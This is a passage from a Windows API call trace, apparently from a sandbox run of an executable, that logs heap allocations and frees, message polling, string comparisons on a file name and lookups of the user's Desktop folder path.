hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0160.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0160.660] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0160.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0160.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a) returned 0x24b64e0 [0160.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0160.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5EdvDyyb.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EdvDyyb.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dvDyyb.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vDyyb.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0160.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dyyb.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yyb.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0160.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yb.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0160.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0160.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0160.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.662] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0160.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0160.662] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0160.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0160.663] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0160.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.663] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0160.665] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0160.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0160.665] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0160.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0160.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0160.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0160.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0160.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0160.668] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.668] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0160.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0160.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0160.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0160.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.670] PeekMessageW (in: 